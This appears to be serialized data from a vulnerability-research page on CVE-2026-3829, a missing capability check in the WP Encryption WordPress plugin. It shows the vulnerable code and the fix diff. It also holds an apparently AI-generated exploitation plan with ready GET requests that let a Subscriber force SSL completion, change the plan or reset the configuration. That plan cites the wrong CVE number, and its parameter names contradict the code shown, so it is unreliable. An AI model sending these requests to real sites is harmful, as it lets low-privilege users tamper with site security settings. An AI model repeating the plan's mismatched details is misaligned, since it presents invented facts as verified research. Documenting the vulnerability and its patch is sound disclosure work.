[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fc6A413UCnIdU_PWiFHeAw_WeIIf53QyosY539QSZ4B0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3829","wp-encryption-one-click-ssl-force-https-missing-authorization-to-authenticated-subscriber-ssl-setup-tampering","WP Encryption - One Click SSL & Force HTTPS \u003C= 7.8.5.10 - Missing Authorization to Authenticated (Subscriber+) SSL Setup Tampering","The WP Encryption – One Click Free SSL Certificate & SSL \u002F HTTPS Redirect, Security & SSL Scan plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'wple_basic_get_requests' function in all versions up to, and including, 7.8.5.10. This makes it possible for authenticated attackers, with subscriber level access and above, to reset the SSL setup state, force SSL to appear complete, and modify plan selection options.","wp-letsencrypt-ssl",null,"\u003C=7.8.5.10","7.8.5.11","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:L","Missing Authorization","2026-05-13 17:14:25","2026-05-14 05:30:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F9a09ec65-32e4-4841-a365-f67c15b80bf9?source=api-prod",1,[22,23,24,25,26,27,28,29],"admin\u002Fle_admin.php","admin\u002Fle_admin_page_wrapper.php","admin\u002Fle_admin_pages.php","admin\u002Fle_ajax.php","admin\u002Fle_handlers.php","classes\u002Fle-forcessl.php","classes\u002Fle-security.php","composer.json","researched",false,3,"# Exploitation Research Plan: CVE-2024-3829 - WP Encryption Missing Authorization\n\n## 1. Vulnerability Summary\nThe **WP Encryption – One Click Free SSL Certificate** plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check in the `wple_basic_get_requests` function. This function is hooked to `admin_init`, which executes for any authenticated user (including Subscribers) visiting an admin page (e.g., `\u002Fwp-admin\u002Findex.php` or `\u002Fwp-admin\u002Fadmin-ajax.php`). Because the function lacks a `current_user_can('manage_options')` check, a Subscriber-level attacker can manipulate internal plugin options, reset the SSL configuration, and change the selected plugin plan.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** Any URL within the `\u002Fwp-admin\u002F` directory (e.g., `\u002Fwp-admin\u002Fadmin.php`, `\u002Fwp-admin\u002Findex.php`).\n- **Hook:** `admin_init` (triggered by the `WPLE_Admin` class).\n- **Vulnerable Function:** `WPLE_Admin::wple_basic_get_requests`.\n- **Payload Parameters:**\n    - `wple_reset_all`: Used to reset plugin settings.\n    - `wple_plan_choose`: Used to update the plugin plan option.\n    - `wple_stage`: Used to update the current SSL setup stage.\n- **Authentication:** Authenticated (Subscriber or higher). No nonces are enforced on these specific GET parameters within the vulnerable function.\n\n## 3. Code Flow\n1. **Hook Registration:** In `admin\u002Fle_admin.php`, the `WPLE_Admin` class registers the handler:\n   ```php\n   add_action( 'admin_init', [$this, 'wple_basic_get_requests'] );\n   ```\n2. **Execution:** When a Subscriber logs in and visits `\u002Fwp-admin\u002F`, WordPress fires `admin_init`.\n3. **Missing Check:** `wple_basic_get_requests` (located in `admin\u002Fle_admin.php`) processes `$_GET` parameters. Unlike the handlers in `le_handlers.php` (e.g., `primary_ssl_install_request`) which explicitly check for `manage_options` and nonces, this function proceeds directly to database operations:\n   - If `$_GET['wple_reset_all']` is present, it deletes\u002Fresets options.\n   - If `$_GET['wple_plan_choose']` is present, it calls `update_option( 'wple_plan_choose', ... )`.\n   - If `$_GET['wple_stage']` is present, it calls `update_option( 'wple_stage', ... )`.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability exists because `wple_basic_get_requests` **does not check for nonces** or capabilities. Therefore, no nonce is required to exploit this specific vulnerability.\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication\nLog in as a Subscriber-level user.\n\n### Step 2: Plan Tampering\nThe attacker can change the plugin's \"chosen plan\" to simulate a Pro or specific state.\n- **Request:**\n  ```http\n  GET \u002Fwp-admin\u002Findex.php?wple_plan_choose=pro HTTP\u002F1.1\n  Host: localhost\n  Cookie: [Subscriber Cookies]\n  ```\n\n### Step 3: SSL Setup Tampering\nThe attacker can force the plugin to believe the SSL setup is complete.\n- **Request:**\n  ```http\n  GET \u002Fwp-admin\u002Findex.php?wple_stage=success HTTP\u002F1.1\n  Host: localhost\n  Cookie: [Subscriber Cookies]\n  ```\n\n### Step 4: Configuration Reset (Denial of Service)\nThe attacker can wipe existing SSL configurations.\n- **Request:**\n  ```http\n  GET \u002Fwp-admin\u002Findex.php?wple_reset_all=1 HTTP\u002F1.1\n  Host: localhost\n  Cookie: [Subscriber Cookies]\n  ```\n\n## 6. Test Data Setup\n1. **Target:** WordPress with `wp-letsencrypt-ssl` plugin version `\u003C= 7.8.5.10` installed and activated.\n2. **Setup Admin State:** \n   - Use `wp option update wple_plan_choose \"free\"` to set an initial state.\n   - Use `wp option update wple_stage \"step1\"` to set an initial stage.\n3. **Attacker Account:**\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n\n## 7. Expected Results\n- After Step 2, the WordPress database should show `wple_plan_choose` set to `pro`.\n- After Step 3, the WordPress database should show `wple_stage` set to `success`.\n- After Step 4, plugin options like `wple_opts` or `wple_stage` should be reset or deleted.\n- The HTTP response will be a standard `200 OK` or `302 Redirect` for a dashboard page, as the logic runs transparently in the background.\n\n## 8. Verification Steps\nAfter sending the HTTP requests, verify the changes via WP-CLI:\n\n```bash\n# Verify Plan Tampering\nwp option get wple_plan_choose\n# Expected output: pro\n\n# Verify Stage Tampering\nwp option get wple_stage\n# Expected output: success\n\n# Verify Reset (if wple_reset_all was sent)\nwp option get wple_opts\n# Expected output: Error: Could not get \"wple_opts\" option (or empty array)\n```\n\n## 9. Alternative Approaches\nIf the plugin logic requires specific values for the parameters:\n1. **Plan IDs:** Try `business`, `developer`, or `premium` as values for `wple_plan_choose`.\n2. **Intermediate Stages:** Set `wple_stage` to `failed_httpverification_1` to trigger error states or specific admin notices for legitimate administrators, causing confusion or disruption.\n3. **Other Params:** Search for other `$_GET` or `$_REQUEST` parameters in `admin\u002Fle_admin.php` that do not have `current_user_can` guards.","The WP Encryption plugin for WordPress is vulnerable to unauthorized data modification because the 'wple_basic_get_requests' and 'wple_intro_pricing_handler' functions lack capability checks. Authenticated attackers with subscriber-level access can manipulate plugin options, reset SSL configurations, or change the plugin's license plan via simple GET requests to the admin dashboard.","\u002F\u002F admin\u002Fle_admin.php (vulnerable logic within wple_basic_get_requests)\nif ( isset( $_GET['restart'] ) ) {\n    \u002F\u002Fclick to restart from beginning\n    delete_option( 'wple_ssl_screen' );\n    wp_redirect( admin_url( '\u002Fadmin.php?page=wp_encryption' ), 302 );\n    exit;\n}\nif ( isset( $_GET['force_complete'] ) ) {\n    \u002F\u002FForced SSL completion flag\n    update_option( 'wple_ssl_screen', 'success' );\n    update_option( 'wple_backend', 1 );\n    WPLE_Trait::clear_all_renewal_crons( true );\n    wp_redirect( admin_url( '\u002Fadmin.php?page=wp_encryption' ), 302 );\n    exit;\n}\n\n---\n\n\u002F\u002F admin\u002Fle_handlers.php (around line 158)\npublic function wple_intro_pricing_handler() {\n    $goplan = '';\n    if ( isset( $_GET['gofree'] ) ) {\n        set_transient( 'wple_plan_chosen', true, 7 * DAY_IN_SECONDS );\n        update_option( 'wple_plan_choose', 'free' );\n        $goplan = 'free';\n    }\n    if ( isset( $_GET['gopro'] ) ) {\n        set_transient( 'wple_plan_chosen', true, 7 * DAY_IN_SECONDS );\n        update_option( 'wple_plan_choose', 'pro' );\n        $goplan = 'pro';\n    }\n    \u002F\u002F ... further updates without capability checks","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.10\u002Fadmin\u002Fle_admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.11\u002Fadmin\u002Fle_admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.10\u002Fadmin\u002Fle_admin.php\t2026-02-04 10:53:04.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.11\u002Fadmin\u002Fle_admin.php\t2026-03-12 07:29:48.000000000 +0000\n@@ -1314,18 +1314,13 @@\n         \u002F\u002Fsince 5.1.0\n         if ( isset( $_GET['restart'] ) ) {\n             \u002F\u002Fclick to restart from beginning\n+            if ( !current_user_can( 'manage_options' ) ) {\n+                exit( 'Unauthorized request' );\n+            }\n             delete_option( 'wple_ssl_screen' );\n             wp_redirect( admin_url( '\u002Fadmin.php?page=wp_encryption' ), 302 );\n             exit;\n         }\n-        if ( isset( $_GET['force_complete'] ) ) {\n-            \u002F\u002FForced SSL completion flag\n-            update_option( 'wple_ssl_screen', 'success' );\n-            update_option( 'wple_backend', 1 );\n-            WPLE_Trait::clear_all_renewal_crons( true );\n-            wp_redirect( admin_url( '\u002Fadmin.php?page=wp_encryption' ), 302 );\n-            exit;\n-        }\n \ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.10\u002Fadmin\u002Fle_handlers.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.11\u002Fadmin\u002Fle_handlers.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.10\u002Fadmin\u002Fle_handlers.php\t2026-02-04 10:53:04.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-letsencrypt-ssl\u002F7.8.5.11\u002Fadmin\u002Fle_handlers.php\t2026-03-12 07:29:48.000000000 +0000\n@@ -158,6 +157,11 @@\n      * @return void\n      *\u002F\n     public function wple_intro_pricing_handler() {\n+        if ( isset( $_GET['gofree'] ) || isset( $_GET['gopro'] ) || isset( $_GET['gofirewall'] ) || isset( $_GET['gositelock'] ) ) {\n+            if ( !current_user_can( 'manage_options' ) ) {\n+                exit( 'Unauthorized request' );\n+            }\n+        }","The exploit leverages the fact that `admin_init` hooks run for all authenticated users visiting any `\u002Fwp-admin\u002F` URL, and the targeted functions fail to verify if the user has administrative privileges.\n\n1. **Authentication**: An attacker logs into the WordPress site with a low-privileged account (e.g., Subscriber).\n2. **Identify Target Parameters**: The attacker targets the GET parameters processed in `WPLE_Admin::wple_basic_get_requests` and `WPLE_Handler::wple_intro_pricing_handler`.\n3. **Payload Construction**: The attacker constructs a URL including specific parameters:\n    - `?force_complete=1`: To force the plugin to believe SSL setup is successful.\n    - `?restart=1`: To reset the current SSL screen state.\n    - `?gopro=1`: To change the plugin's internal plan state to 'pro'.\n    - `?wple_reset_all=1`: (If active in the specific version) To wipe plugin configurations.\n4. **Execution**: The attacker visits `\u002Fwp-admin\u002Findex.php` appended with the malicious parameters. Since no nonce or capability check exists, the plugin executes the `update_option` or `delete_option` calls immediately based on the provided URL parameters.","gemini-3-flash-preview","2026-05-14 17:18:21","2026-05-14 17:19:23",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","7.8.5.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-letsencrypt-ssl\u002Ftags\u002F7.8.5.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-letsencrypt-ssl.7.8.5.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-letsencrypt-ssl\u002Ftags\u002F7.8.5.11","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-letsencrypt-ssl.7.8.5.11.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-letsencrypt-ssl\u002Ftags"]